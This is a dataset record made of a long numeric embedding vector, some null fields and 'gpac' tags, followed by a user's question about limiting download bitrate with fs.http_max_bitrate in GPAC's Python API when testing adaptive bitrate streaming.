0.01412689033895731, 0.017162669450044632, -0.002218598034232855, 0.007127317134290934, -0.00759320380166173, -0.001933054649271071, 0.02034873329102993, -0.012751772999763489, 0.003233029041439295, -0.0062180859968066216, -0.00952062290161848, 0.014119376428425312, -0.00953565165400505, -0.002410212764516473, 0.011632141657173634, 0.015321665443480015, 0.00793510489165783, 0.011361626908183098, -0.00850619189441204, 0.009392879903316498, -0.004997011739760637, 0.0012642815709114075, -0.025248060002923012, 0.0011675349669530988, -0.0035674155224114656, 0.0041103241965174675, -0.015163864940404892, 0.0021904194727540016, -0.02294868230819702, 0.0019443260971456766, 0.010985911823809147, 0.004692682530730963, -0.008258219808340073, -0.024902401491999626, -0.01396157592535019, -0.013676032423973083, 0.021430794149637222, -0.002708906540647149, 0.0036707373801618814, -0.014983521774411201, -0.0006532747647725046, -0.004621296655386686, 0.006965759210288525, 0.01015933882445097, 0.007544360589236021, -0.007025873754173517, 0.012841944582760334, 0.002254290971904993, 0.018485186621546745, 0.0016606610734015703, -0.012045429088175297, -0.004414653405547142, -0.0005405602278187871, -0.01517137885093689, 0.0028535567689687014, -0.03342362120747566, -0.010437367483973503, 0.01196277141571045, -0.0006279139779508114, 0.002248655306175351, 0.001138417050242424, 0.014885835349559784, 0.015584665350615978, -0.017613528296351433, -0.018996158614754677, -0.002404577098786831, -0.0025398347061127424, -0.0025999490171670914, -0.014863292686641216, 0.006999573670327663, -0.0038285376504063606, 0.011211341246962547, 0.007694646716117859, 0.0084761343896389, -0.004711468238383532, -0.012218257412314415, 0.00443719606846571, -0.022603025659918785, -0.010219452902674675, -0.02888498269021511, 0.01415694784373045, 0.0062819579616189, 0.008040305227041245, -0.014262148179113865, 0.0014915892388671637, -0.013488175347447395, 0.012826915830373764, -0.00034565795795060694, 0.013119974173605442, -0.005538041703402996, -0.0016991718439385295, -0.001609939499758184, -0.034144993871450424, 0.0018663652008399367, 0.01257894467562437, 0.01212808582931757, 0.034144993871450424, 0.008709077723324299, -0.0068793450482189655, -0.0017583470325917006, -0.03369413688778877, 0.013901461847126484, 0.01662163995206356, 0.009836222976446152, 0.0040952954441308975, -0.0027107850182801485, 0.01438237726688385, 0.035106826573610306, 0.010820597410202026, 0.009174964390695095, -0.016877125948667526, -0.0025360775180161, 0.009971480816602707, -0.011083598248660564, -0.0006668944261036813, 0.010121766477823257, 0.03061327338218689, -0.027848009020090103, 0.002885492518544197, 0.018094442784786224, -0.013450603000819683, -0.005357698537409306, -0.03757151961326599, 0.00926513597369194, 0.012270857580006123, -0.008746649138629436, 0.0015798823442310095, 0.011233883909881115, -0.01825975812971592, 0.012984716333448887, -0.008393476717174053, 0.0004764538025483489, 0.010843140073120594, -0.006157971918582916, 0.0036557086277753115, -0.009385365061461926, -0.012180685997009277, -0.0022467768285423517, -0.03249184787273407, 0.0018259757198393345, 0.008663992397487164, -0.00226744101382792, 0.009851251728832722, 0.008739135228097439, 0.010700368322432041, 0.01096336916089058, 0.021881652995944023, 0.011857571080327034, 0.0023538556415587664, 0.02031867764890194, -0.004538639448583126, 0.020964907482266426, 0.035317227244377136, 0.008701563812792301, -0.003310050815343857, 0.00474528269842267, -0.005639484617859125, -0.0036087443586438894, -0.024631887674331665, -0.016756897792220116, -0.00396003806963563, -0.01683204062283039, 0.019552217796444893, -0.013330374844372272, 0.008235677145421505, -0.017688671126961708, -0.0052337124943733215, -0.001524464343674481, -0.006499872542917728, 0.0190713033080101, -0.011617112904787064, 0.020363762974739075, -0.008198104798793793, 0.017493298277258873, 0.0032875079195946455, -0.0002294210862601176, -0.05440355837345123, 0.0030076000839471817, 0.0028141066431999207, -0.002665699226781726, -0.007484246511012316, 0.011617112904787064, -0.0016522074583917856, -0.007074716966599226, 0.0032048504799604416, -0.023204170167446136, 0.004805397242307663, 0.016275981441140175, -0.025638803839683533, 0.017733756452798843, -0.0011966528836637735, 0.02846418134868145, -0.017403127625584602, 0.008220648393034935, -0.0024759629741311073, 0.0046025109477341175, 0.013630947098135948, -0.005789770744740963, -0.020483991131186485, 0.00025971312425099313, -0.0013497567269951105, -0.007709675468504429, 0.024631887674331665, -0.0024214843288064003, -0.000802151917014271, -0.009250108152627945, -0.009107336401939392, -0.009858766570687294, 0.01193271391093731, -0.0026976349763572216, 0.012834430672228336, 0.024902401491999626, -0.007702161092311144, 0.03685014322400093, -0.0057183848693966866, -0.000030614915885962546, 0.004403382074087858, 0.016336096450686455, -0.006285714916884899, 0.0004809154197573662, -0.004891811870038509, 0.018665529787540436, 0.02034873329102993, 0.0014239605516195297, 0.006954487878829241, -0.03267219290137291, -0.005658270791172981, -0.0006866194889880717, 0.011880113743245602, -0.004591239616274834, 0.029380926862359047, -0.0009777987143024802, 0.008942021057009697, 0.006804201751947403, -0.007450432050973177, 0.007093502674251795, 0.015269065275788307, 0.007146102841943502, -0.008153019472956657, 0.009994023479521275, -0.004538639448583126, -0.006909402087330818, 0.022302452474832535, 0.00785996112972498, 0.005955085624009371, 0.009941423311829567, 0.023564856499433517, -0.014314748346805573, -0.024211086332798004, -0.014359834603965282, 0.005831099580973387, -0.0018832723144441843, 0.0008350269636139274, -0.006800444796681404, 0.002740842290222645, 0.018214672803878784, -0.015051149763166904, 0.02204696647822857, 0.009362822398543358, 0.012826915830373764, 0.027667665854096413, 0.015825122594833374, -0.027141664177179337, 0.01593032293021679, -0.0006640765932388604, 0.01828981563448906, 0.014780635014176369, 0.038202717900276184, -0.014510120265185833, 0.005147297866642475, -0.01394654717296362, -0.0006570318946614861, 0.01147434115409851, -0.004324481822550297, 0.001449321280233562, 0.005504227243363857, 0.002671334892511368, -0.010910768993198872, 0.009978994727134705, -0.01011425256729126, -0.002248655306175351, 0.022272394970059395, -0.007375288754701614, -0.015133807435631752, 0.01674186810851097, 0.047009482979774475, 0.012075485661625862, 0.004268124233931303, 0.026660749688744545, 0.017027411609888077, 0.016516439616680145, 0.003249936271458864, 0.001151566975750029, -0.018755702301859856, 0.0029286998324096203, 0.03134967386722565, -0.003330715000629425, -0.010467424988746643, 0.009580736979842186, 0.011579541489481926, -0.0018569722305983305, -0.006203057710081339, -0.0009331826004199684, 0.012706687673926353, -0.015239007771015167, 0.008220648393034935, -0.008303305134177208, 0.02688617818057537, -0.02070942148566246, 0.01250380091369152, -0.01148936990648508, 0.005214926786720753, -0.012007856741547585, 0.011752370744943619, -0.03745128959417343, 0.035317227244377136, 0.021596107631921768, -0.01015933882445097, 0.005331398453563452, -0.02079959213733673, -0.000025933153665391728, -0.026179833337664604, 0.007660832721740007, -0.007014602422714233, 0.0004301938752178103, 0.015404322184622288, -0.01859038695693016, 0.00953565165400505, -0.003139100270345807, -0.009558194316923618, -0.017493298277258873, 0.01874067261815071, -0.0037177016492933035, 0.005184869281947613, 0.03171036019921303, 0.025698918849229813, -0.01611066609621048, 0.006011442746967077, -0.016245923936367035, 0.012263343669474125, 0.0029775428120046854, 0.027051493525505066, 0.010024080984294415, 0.00009199151099892333, 0.005260012578219175, -0.011842542327940464, 0.04502570629119873, -0.021716337651014328, 0.012624030001461506, -0.023549826815724373, 0.0030339001677930355, 0.0057484423741698265, 0.030538130551576614, 0.0302826426923275, 0.0036369229201227427, 0.002755870809778571, -0.019206559285521507, -0.008092905394732952, -0.00353547977283597, -0.010745454579591751, 0.0061016143299639225, 0.01647135429084301, 0.006567501462996006, -0.03363402187824249, -0.01399163343012333, 0.006766630336642265, -0.015344208106398582, 0.0033156864810734987, -0.000714328489266336, -0.004343267530202866, -0.00238015572540462, -0.02810349501669407, 0.0045949965715408325, 0.01533669326454401, 0.025368288159370422, -0.0062331147491931915, 0.005019554868340492, -0.02049902081489563, -0.01602049544453621, -0.010813082568347454, 0.0125639159232378, -0.017974214628338814, -0.01578003726899624, -0.028088467195630074, 0.0032292718533426523, 0.01238357275724411, 0.021400736644864082, 0.004557425156235695, -0.017358040437102318, 0.023790284991264343, 0.011759885586798191, -0.0012943388428539038, 0.0026750920806080103, -0.00523746944963932, -0.01148936990648508, 0.03291264921426773, -0.015855180099606514, -0.004076509736478329, -0.0034847583156079054, -0.021686280146241188, -0.001192895695567131, 0.022092051804065704, 0.0033889508340507746, -0.013924004510045052, 0.030177442356944084, 0.019447017461061478, 0.010452396236360073, 0.002825378207489848, -0.001508496468886733, -0.007829904556274414, -0.00364819448441267, -0.006883102003484964, 0.00010291073704138398, 0.00226744101382792, 0.021355651319026947, -0.02655554935336113, -0.0006565622752532363, -0.006777901668101549, -0.02079959213733673, -0.01859038695693016, -0.017553413286805153, 0.012571429833769798, -0.025999490171670914, -0.008205619640648365, -0.01689215376973152, -0.021310564130544662, 0.0186204444617033, -0.0052261981181800365, 0.009092307649552822, 0.027742808684706688, 0.00463256798684597, -0.02052907831966877, -0.004842968657612801, 0.006890616379678249, -0.00136666395701468, -0.0038961663376539946, -0.02652549184858799, 0.009670908562839031, -0.0009646487305872142, 0.018184615299105644, -0.008881906978785992, -0.009174964390695095, -0.03570796921849251, 0.017207754775881767, 0.014803177677094936, 0.0003390829369891435, -0.012939631007611752, 0.00040037150029093027, 0.010482453741133213, 0.01518640760332346, 0.034655969589948654, 0.010955854319036007, -0.02419605664908886, 0.015569636598229408, -0.017914099618792534, -0.003661344526335597, 0.03070344403386116, -0.008423534221947193, -0.00011981791612925008, 0.01033968199044466, -0.007029631175100803, 0.018034327775239944, 0.006319529376924038, -0.029786698520183563, -0.0032912648748606443, -0.00011817416816484183, 0.00287234247662127, -0.019161473959684372, -0.028389038518071175, -0.008288277313113213, -0.012240801006555557, -0.02491743117570877, -0.014848263934254646, 0.009978994727134705, 0.02303885482251644, 0.0278630368411541, -0.021430794149637222, 0.016756897792220116, 0.009385365061461926, 0.01831987127661705, -0.01432226225733757, -0.015254036523401737, -0.014419948682188988, -0.021671252325177193, 0.0017921613762155175, -0.0076082325540483, -0.01605055294930935, -0.009220050647854805, 0.014863292686641216, 0.006977031007409096, 0.0028685852885246277, 0.010767997242510319, -0.0016738111153244972, 0.004519853740930557, -0.0018128257943317294, 0.016275981441140175, -0.0028667068108916283, -0.00894953589886427, 0.002023226348683238, -0.009287679567933083, 0.015629751607775688, -0.009700966067612171, 0.0038811378180980682, 0.00710101705044508, -0.005797285120934248, -0.0270965788513422, -0.0009759201784618199, -0.005887456703931093, -0.033934593200683594, 0.007450432050973177, 0.002509777434170246, 0.002528563141822815, -0.013856375589966774, -0.009272650815546513, 0.009761080145835876, 0.014825721271336079, -0.005256255157291889, -0.006157971918582916, 0.015103749930858612, 0.004016395192593336, -0.0010613953927531838, 0.006203057710081339, -0.008062847889959812, -0.0021697550546377897, -0.005560584831982851, -0.012315943837165833, 0.00016754548414610326, 0.021460851654410362, -0.023053882643580437, -0.017087526619434357, -0.015261550433933735, 0.008190590888261795, 0.022332509979605675, 0.01777884177863598, -0.0021415764931589365, 0.01117376983165741, 0.007972676306962967, 0.016125695779919624, -0.02697635069489479, -0.0019818975124508142, 0.013082402758300304, -0.010467424988746643, -0.0007138588698580861, -0.007672104053199291, 0.002137819305062294, 0.00667645875364542, 0.007273845840245485, -0.023414570838212967, 0.017613528296351433, -0.010865682736039162, 0.006575015839189291, 0.0025191702879965305, 0.002906156936660409, -0.0028065924998372793, -0.009994023479521275, -0.005038340575993061, -0.005943814292550087, -0.002096490701660514, -0.0006795748486183584, 0.0025943133514374495, 0.021325593814253807, -0.008851849474012852, 0.0024628129322081804, 0.03558774292469025, 0.000015248752788465936, 0.014232090674340725, -0.01396157592535019, 0.004241824150085449, 0.00474528269842267, 0.008205619640648365, 0.01704244129359722, -0.019266674295067787, -0.0023125270381569862, -0.014810692518949509, 0.019176503643393517, 0.009843737818300724, -0.013856375589966774, 0.002406455809250474, 0.0002456237853039056, -0.0028479211032390594, -0.00832584872841835, 0.01248877216130495, 0.0071160453371703625, 0.010880711488425732, 0.022963711991906166, 0.0059851426631212234, 0.021701307967305183, -0.024226114153862, 0.010151823982596397, -0.004350781906396151, 0.01238357275724411, 0.0012999745085835457, 0.0178690142929554, 0.002410212764516473, 0.0040877810679376125, 0.001037913141772151, -0.004035180900245905, 0.007844933308660984, -0.0186204444617033, 0.0029286998324096203, -0.012511315755546093, -0.016065580770373344, 0.021490909159183502, 0.035076770931482315, -0.02073947712779045, 0.003003842895850539, 0.004358296282589436, -0.005526770371943712, -0.0030808644369244576, 0.015148836188018322, -0.026330118998885155, 0.00003170096897520125, -0.011436769738793373, -0.0004233840445522219, 0.01995798945426941, -0.004249338526278734, 0.00003989038668805733, -0.014525149017572403, -0.001480317790992558, 0.0021096407435834408, -0.008979592472314835, -0.02995201386511326, 0.00813047681003809, -0.016486382111907005, -0.022092051804065704, 0.0046100253239274025, -0.0135482894256711, 0.007717189844697714, 0.00047786274808458984, 0.01605055294930935, 0.025082744657993317, -0.029516184702515602, -0.002528563141822815, 0.012714201584458351, -0.013232688419520855, 0.03204099088907242, 0.001001280965283513, 0.010858168825507164, -0.01253385841846466, 0.02419605664908886, 0.006060285959392786, 0.0033532578963786364, -0.0021490908693522215, -0.0008937324746511877, -0.00232379836961627, -0.003351379418745637, -0.04460490494966507, 0.005883699748665094, 0.006349586416035891, -0.013683547265827656, -0.000011168720448040403, 0.0157499797642231, -0.003952523693442345, -0.025668861344456673, 0.025939375162124634, -0.004474767949432135, 0.016396209597587585, 0.015524551272392273, 0.0014145676977932453, -0.0017179576680064201, 0.011789942160248756, -0.0010783026227727532, 0.0005612245295196772, 0.005399026907980442, -0.027457265183329582, 0.012887030839920044, -0.008942021057009697, -0.011038511991500854, -0.0004846725787501782, 0.00011330161214573309, 0.003997609484940767, -0.011481855995953083, 0.024541715160012245, 0.015975410118699074, 0.008926992304623127, 0.0010679704137146473, -0.0019969262648373842, 0.00990385189652443, 0.004914354532957077, 0.0002027687878580764, 0.008355905301868916, -0.013450603000819683, -0.005962600000202656, -0.0059776282869279385, 0.015449408441781998, -0.0157499797642231, -0.001415506936609745, 0.01320263184607029, 0.0018250364810228348, 0.019326789304614067, -0.015051149763166904, 0.00912987906485796, -0.001980019034817815, -0.010858168825507164, 0.006567501462996006, -0.016275981441140175, -0.012255828827619553, 0.009024678729474545, 0.00896456465125084, 0.001322517404332757, -0.003997609484940767, -0.01218820083886385, -0.02189668081700802, -0.006120400503277779, -0.0007270088535733521, -0.00908479280769825, 0.008739135228097439, -0.017598498612642288, 0.004786611534655094, 0.019191531464457512, 0.017162669450044632, -0.002680727746337652, 0.0066088298335671425, 0.010512510314583778, -0.009978994727134705, 0.015178893692791462, -0.027817951515316963, -0.017613528296351433, 0.01193271391093731, 0.011865084990859032, 0.0008063787245191634, 0.004136624280363321, -0.00831081997603178, 0.01571992225944996, 0.010414824821054935, -0.0047264969907701015, 0.013022287748754025, -0.02025856263935566, -0.035437457263469696, 0.012826915830373764, -0.015704894438385963, 0.014735549688339233, 0.0031973361037671566, 0.002911792602390051, -0.012428658083081245, -0.0004243233415763825, 0.026179833337664604, -0.015239007771015167, -0.009122364223003387, -0.002002561930567026, 0.008355905301868916, -0.002288105431944132, -0.004951925948262215, 0.001144052715972066, -0.0016493896255269647, 0.012864488177001476, -0.010752968490123749, 0.011466827243566513, 0.0062256003729999065, 0.005211169365793467, -0.02852429635822773, 0.019942961633205414, 0.016245923936367035, 0.016005465760827065, 0.011038511991500854, 0.008648963645100594, -0.015163864940404892, 0.003603108460083604, -0.0031278289388865232, -0.0044634961523115635, -0.0004694091621786356, -0.005849885288625956, 0.021551022306084633, -0.010219452902674675, 0.0075180609710514545, 0.0032123648561537266, -0.004933140240609646, -0.00006663073872914538, -0.013360431417822838, -0.01320263184607029, -0.004313210491091013, 0.007454189006239176, 0.01496097818017006, -0.0017376827308908105, 0.002459055744111538, 0.009159935638308525, 0.0018926651682704687, -0.027261894196271896, -0.03146990388631821, -0.011579541489481926, -0.000030174625862855464, -0.009362822398543358, 0.017087526619434357, -0.01629100926220417, -0.0025266846641898155, 0.012240801006555557, -0.003728973213583231, -0.019101358950138092, -0.004279396031051874, -0.006135428790003061, 0.0045949965715408325, -0.004677653778344393, 0.006796687375754118, -0.005515499040484428, -0.021566051989793777, 0.009362822398543358, -0.004275638610124588, -0.0032292718533426523, -0.007431646343320608, 0.016576554626226425, -0.013165059499442577, -0.002864828333258629, -0.019326789304614067, 0.001974383369088173, -0.010009052231907845, 0.017884042114019394, -0.02667577750980854, -0.00030808645533397794, 0.004459739197045565, -0.0001902058138512075, 0.0064923581667244434, 0.01439740601927042, -0.004275638610124588, 0.005406541284173727, 0.0017592862714082003, 0.011346598155796528, 0.010572625324130058, -0.014389891177415848, 0.012458715587854385, -0.0007941679796203971, -0.003770301816985011, -0.002316283993422985, 0.015674836933612823, -0.009032192640006542, 0.012924602255225182, -0.006191786378622055, -0.017718728631734848, 0.018154557794332504, 0.030478015542030334, -0.022813426330685616, 0.017643583938479424, 0.007619503885507584, -0.0036294085439294577, -0.012654087506234646, -0.0044710105285048485, -0.001045427517965436, -0.003659465815871954, 0.019206559285521507, 0.0007472035358659923, 0.0033682866487652063, -0.006075314246118069, -0.02398565784096718, 0.03177047520875931, 0.01831987127661705, 0.004256852902472019, -0.01837998628616333, -0.02416600100696087, -0.0029850571881979704, 0.012706687673926353, -0.006992059294134378, 0.03546751290559769, 0.03061327338218689, 0.012428658083081245, 0.008220648393034935, 0.005147297866642475, -0.006950730923563242, 0.008724106475710869, -0.011955256573855877, -0.009978994727134705, 0.016756897792220116, 0.0010050381533801556, 0.006980787962675095, 0.01841004379093647, -0.013691061176359653, 0.010557596571743488, -0.008400991559028625, -0.010317138396203518, -0.0017611648654565215, 0.023459656164050102, -0.0066238585859537125, 0.01351823192089796, 0.002583041787147522, -0.028389038518071175, 0.012120571918785572, -0.010715397074818611, -0.002466570120304823, -0.009377851150929928, -0.02586423233151436, 0.014329777099192142, -0.02488737367093563, -0.005654513370245695, 0.002207326702773571, 0.017673641443252563, -0.008453591726720333, 0.012466229498386383, -0.0043470244854688644, 0.0034903939813375473, 0.002455298788845539, 0.015659809112548828, -0.007033388130366802, -0.0013046709354966879, 0.021596107631921768, -0.0007213731296360493, 0.02273828350007534, -0.007844933308660984, 0.0066238585859537125, 0.02061924897134304, -0.01841004379093647, -0.00808539055287838, 0.0009759201784618199, -0.008303305134177208, -0.005196141079068184, 0.007844933308660984, 0.022242339327931404, -0.038322947919368744, -0.023369483649730682, -0.0030526858754456043, -0.01315754558891058, -0.016576554626226425, 0.009618308395147324, -0.005391512997448444, 0.00912987906485796, -0.007987705059349537, 0.00807036180049181, 0.000052658830099971965, -0.01315754558891058, 0.01789907179772854, -0.009791137650609016, 0.005507984664291143, 0.008032790385186672, 0.004459739197045565, -0.02530817501246929, -0.013074887916445732, -0.009881309233605862, 0.023970628157258034, -0.023805314674973488, -0.009092307649552822, 0.01605055294930935, -0.004200495779514313, -0.0009604219230823219, -0.0022223552223294973, 0.012255828827619553, 0.030808644369244576, -0.002406455809250474, 0.00598890008404851, -0.025774061679840088, -0.008686535060405731, 0.027682693675160408, 0.004388353321701288, 0.003103407332673669, 0.01318760309368372, 0.028088467195630074, -0.001658782479353249, 0.01133908424526453, 0.005891214124858379, 0.0025248059537261724, -0.010813082568347454, -0.02198685146868229, -0.013074887916445732, 0.011166254989802837, -0.0017564684385433793, 0.0002453889755997807, 0.012278372421860695, -0.003926223609596491, -0.023715142160654068, 0.006984545383602381, -0.00832584872841835, 0.003922466654330492, -0.0442141629755497, 0.00414038123562932, 0.014818206429481506, 0.004301938693970442, -0.01312748808413744, 0.0029963285196572542, -0.010745454579591751, 0.0066163442097604275, -0.000952437985688448, 0.010940826497972012, 0.006544958334416151, -0.0018682436784729362, 0.001666296855546534, 0.006015200167894363, -0.011376655660569668, -0.01810947246849537, 0.007837418466806412, -0.01674186810851097, -0.00425309594720602, -0.019341817125678062, 0.001589275198057294, -0.014645378105342388, 0.002453420078381896, -0.006037742830812931, 0.005970114376395941, 0.007604475133121014, 0.022422682493925095, 0.006556229665875435, 0.02022850513458252, -0.01995798945426941, 0.011181283742189407, -0.02043890580534935, -0.005808556452393532, 0.010437367483973503, -0.006210572086274624, -0.008573820814490318, -0.017538385465741158, -0.001570489490404725, 0.00932525098323822, -0.014412433840334415, -0.000947271881159395, -0.004749039653688669, -0.015584665350615978, -0.0079501336440444, 0.0015413715736940503, -0.002015711972489953, -0.0012642815709114075, 0.0016550254076719284, 0.011256426572799683, -0.020754506811499596, 0.0045010680332779884, -0.010843140073120594, 0.018425071612000465, -0.010692854411900043, 0.01357834693044424, -0.015734951943159103, 0.014758092351257801, 0.008025276474654675, -0.015885237604379654, -0.0025924346409738064, 0.01396157592535019, 0.019762618467211723, -0.012887030839920044, 0.013059860095381737, -0.007709675468504429, -0.0035073012113571167, -0.0008458287920802832, 0.004275638610124588, 0.0031278289388865232, -0.0020251048263162374, 0.0024571772664785385, -0.005507984664291143, -0.00598890008404851, 0.009062250144779682, 0.00040225006523542106, -0.005417813081294298, -0.015524551272392273, 0.04015643894672394, 0.0022899839095771313, -0.009317736141383648, 0.0036820087116211653, 0.020784564316272736, 0.0046175397001206875, 0.005511741619557142, 0.004542396403849125, 0.005613184999674559, -0.025233032181859016, -0.005928785540163517, 0.023534798994660378, 0.015111264772713184, 0.0009101700270548463, -0.008438562974333763, 0.007792332675307989, -0.02216719649732113, -0.014442491345107555, 0.01810947246849537, 0.022633083164691925, -0.015051149763166904, -0.0442141629755497, -0.01904124580323696, -0.0011402955278754234, 0.019717533141374588, -0.014938435517251492, 0.005846128333359957, 0.013300317339599133, 0.030417900532484055, 0.0036820087116211653, 0.0007110409787856042, 0.030838701874017715, 0.004305696114897728, 0.003990095108747482, 0.0028460423927754164, -0.017643583938479424, 0.0063721295446157455, -0.0034828796051442623, 0.009731023572385311, -0.0003327427548356354, 0.012736744247376919, 0.002201691037043929, -0.016005465760827065, -0.015223979018628597, 0.0159002672880888, 0.0218065083026886, 0.0249775443226099, 0.0021603622008115053, 0.002057040575891733, -0.0008711895789019763, -0.004801639821380377, 0.0035411156713962555, 0.010174366645514965, 0.006432244088500738, 0.025383317843079567, -0.004395867697894573, 0.023429598659276962, 0.017297927290201187, 0.005643242038786411, -0.00008236381108872592, 0.0006964820204302669, 0.01199282892048359, -0.0030545643530786037, 0.016997354105114937, -0.0036218944005668163, 0.004929383285343647, 0.011752370744943619, 0.014615320600569248, 0.016306038945913315, 0.006011442746967077, 0.014277176931500435, 0.01578003726899624, 0.015178893692791462, 0.01856032945215702, -0.010783025994896889, -0.0010726668406277895, -0.00909982156008482, 0.021325593814253807, -0.0077397325076162815, -0.006188028957694769, -0.011722313240170479, 0.008679020218551159, 0.008791735395789146, 0.05695842206478119, 0.0004402912163641304, -0.020664334297180176, -0.029441041871905327, -0.006274443585425615, 0.01291708741337061, -0.029666470363736153, 0.039675522595644, 0.00228246976621449, 0.015088721178472042, -0.015163864940404892, -0.000877294922247529, 0.005534284748136997, 0.03216122090816498, 0.004099052399396896, 0.01314251683652401, 0.014705492183566093, 0.004933140240609646, -0.00697327358648181, -0.014825721271336079, -0.013014773838222027, -0.010512510314583778, 0.00333822937682271, 0.005222441162914038, 0.008431049063801765, -0.008190590888261795, 0.02992195636034012, -0.002727692248299718, -0.033994708210229874, -0.013871404342353344, 0.019747590646147728, 0.014389891177415848, -0.02076953463256359, -0.006041500251740217, -0.010565110482275486, -0.009528136812150478, -0.011677227914333344, 0.005447870120406151, 0.00026534884818829596, 0.026239948347210884, -0.04346273094415665, -0.007007088046520948, -0.028599439188838005, 0.006229357793927193, -0.02061924897134304, -0.0017912221373990178, 0.00022754250676371157, 0.007533089257776737, 0.004636325407773256, -0.0023707628715783358, 0.00850619189441204, -0.01312748808413744, 0.002994450042024255, 0.005429084412753582, -0.008881906978785992, -0.01538177952170372, -0.008370934054255486, 0.01257894467562437, 0.008709077723324299, 0.00089795928215608, -0.02094987779855728, 0.021130220964550972, 0.005605670623481274, 0.035317227244377136, -0.012458715587854385, -0.01250380091369152, -0.004384596366435289, -0.0028817353304475546, 0.016937240958213806, -0.0051247552037239075, -0.006883102003484964, -0.010527539066970348, -0.017568441107869148, -0.012669116258621216, -0.0005142601439729333, -0.0157499797642231, 0.0009463325841352344, -0.015629751607775688, -0.004365810193121433, -0.011331569403409958, 0.011639656499028206, -0.007965161465108395, 0.008731620386242867, 0.011887628585100174, -0.0014558963011950254, 0.006650158669799566, -0.03306293487548828, 0.015599694103002548, 0.009836222976446152, -0.000149464191053994, -0.010767997242510319, -0.0053727272897958755, -0.023519771173596382, -0.0017592862714082003, 0.01644129678606987, -0.02458680048584938, -0.013630947098135948, 0.016065580770373344, 0.014652892015874386, -0.007867475971579552, 0.005177355371415615, -0.000986252329312265, 0.002658184850588441, 0.01874067261815071, -0.00909982156008482, 0.005496712867170572, -0.012939631007611752, 0.013608403503894806, 0.02067936398088932, -0.004700196906924248, -0.002761506475508213, 0.011121169663965702, -0.002968149958178401, -0.01662163995206356, 0.002913671312853694, -0.017433185130357742, 0.014434977434575558, -0.029110413044691086, -0.027622580528259277, -0.004764068406075239, 0.01995798945426941, 0.013300317339599133, 0.014795663766562939, -0.002994450042024255, 0.005105969496071339, -0.014652892015874386, -0.015359236858785152, 0.006195543333888054, -0.002385791391134262, -0.009392879903316498, -0.018154557794332504, -0.010843140073120594, 0.038262832909822464, 0.005098455119878054, 0.046708911657333374, 0.008754163980484009, 0.002119033597409725, 0.007292631547898054, 0.010369738563895226, -0.01415694784373045, 0.0017921613762155175, 0.004805397242307663, -0.01517137885093689, 0.008431049063801765, -0.014900864101946354, 0.0021227907855063677, 0.028043381869792938, 0.0058799427933990955, 0.014495091512799263, 0.003762787440791726, -0.0011355991009622812, 0.004516096320003271, -0.001593971624970436, -0.004948168992996216, -0.011985314078629017, 0.0003778285754378885, 0.019281702116131783, 0.0009491504752077162, 0.01251882966607809, 0.010587654076516628, 0.020784564316272736, 0.006853044964373112, 0.008400991559028625, -0.0405772402882576, 0.008746649138629436, 0.0015047392807900906, 0.012796859256923199, 0.020213477313518524, 0.00392998056486249, 0.011797457002103329, -0.005966356955468655, 0.02491743117570877, 0.015765009447932243, -0.009400393813848495, 0.03013235703110695, -0.017087526619434357, -0.01517137885093689, -0.001925540273077786, 0.018334900960326195, 0.004737768322229385, -0.00649611558765173, -0.006815473549067974, 0.010873197577893734, 0.007927590049803257, -0.005996414460241795, -0.006402186583727598, 0.014329777099192142, -0.01011425256729126, -0.0015301001258194447, -0.02470703050494194, 0.0016503289807587862, 0.004936897661536932, -0.022753311321139336, -0.007037145085632801, -0.0012407994363456964, -0.023730169981718063, 0.008333362638950348, 0.005297583993524313, -0.01844010129570961, 0.007563146762549877, 0.018785759806632996, -0.0052337124943733215, -0.00988882314413786, 0.02476714551448822, 0.01312748808413744, -0.001107420539483428, 0.0035824442747980356, -0.0073640174232423306, -0.00828076247125864, -0.021085135638713837, 0.026089662685990334, -0.013495689257979393, -0.005004526115953922, 0.0040877810679376125, -0.01904124580323696, 0.004016395192593336, -0.0011797456536442041, -0.0002914140932261944, -0.0000307029731629882, -0.018364958465099335, -0.016005465760827065, -0.01257894467562437, -0.005459141451865435, 0.003777816193178296, 0.037992317229509354, 0.004925625864416361, -0.012601487338542938, -0.03159013390541077, -0.000388160755392164, -0.0077472468838095665, -0.006142943166196346, 0.011496884748339653, 0.006127914413809776, 0.010625225491821766, 0.0019894118886440992, 0.02676595002412796, -0.028118524700403214, -0.004880540072917938, 0.0024496628902852535, -0.025233032181859016, -0.010955854319036007, -0.023444626480340958, -0.014690463431179523, -0.003740244545042515, 0.0021904194727540016, 0.0189210157841444, -0.00273332791402936, 0.008258219808340073, 0.017072496935725212, -0.012984716333448887, -0.00887439213693142, 0.01804935745894909, 0.0034396725241094828, 0.001270856591872871, -0.004640082363039255, -0.013691061176359653, 0.009272650815546513, 0.005462898872792721, -0.008784220553934574, -0.0062406291253864765, 0.0181695856153965, 0.013292803429067135, 0.017282897606492043, -0.009708479978144169, -0.02076953463256359, -0.013788746669888496, -0.019852790981531143, 0.00890444964170456, -0.00463256798684597, 0.018815815448760986, -0.0049707116559147835, 0.004264367278665304, -0.023519771173596382, 0.00019290625641588122, -0.019206559285521507, 0.04063735529780388, 0.018395015969872475, -0.0008026215364225209, 0.0016681754495948553, 0.011556998826563358, -0.02583417482674122, -0.007307660300284624, -0.01850021630525589, -0.03318316489458084, 0.015261550433933735, 0.003573051420971751, 0.04211015626788139, 0.008183076977729797, -0.01156451366841793, 0.0017508327728137374, -0.002665699226781726, 0.007352746091783047, -0.03387448191642761, 0.023249255493283272, 0.01454769168049097, -0.0009618308395147324, -0.0022505340166389942, 0.009250108152627945, -0.00556434178724885, -0.002434634370729327, -0.0044634961523115635, 0.016155753284692764, 0.016877125948667526, -0.008190590888261795, 0.0019039366161450744, 0.002917428268119693, -0.0004708180786110461, 0.0006889677024446428, 0.023970628157258034, 0.0015657930634915829, -0.0007716250256635249, -0.00850619189441204, 0.0159002672880888, 0.027442237362265587, 0.009422936476767063, 0.011391684412956238, -0.03225139155983925, 0.004572453908622265, 0.017643583938479424, 0.004910597577691078, -0.010685339570045471, -0.017823928967118263, -0.003201093291863799, 0.01052002515643835, -0.011121169663965702, -0.030628301203250885, 0.004756554029881954, -0.012706687673926353, -0.009227564558386803, 0.006090342998504639, 0.0032799935434013605, -0.016005465760827065, 0.008183076977729797, 0.011000940576195717, -0.01109862606972456, -0.013390488922595978, -0.01704244129359722, 0.016847068443894386 ]
null
null
null
null
null
null
null
null
null
[ "gpac", "gpac" ]
1.I want to test my own Adaptive Bitrate Streaming (ABS). Is fs.http_max_bitrate used to limit the download rate? I set fs.http_max_bitrate=700000, but it did not reflect on stats.total_rate and stats.download_rate. What should I do? 2.For most cases, is the switching of video quality based on stats.total_rate?
I want to ask some questions about python api(ABS)
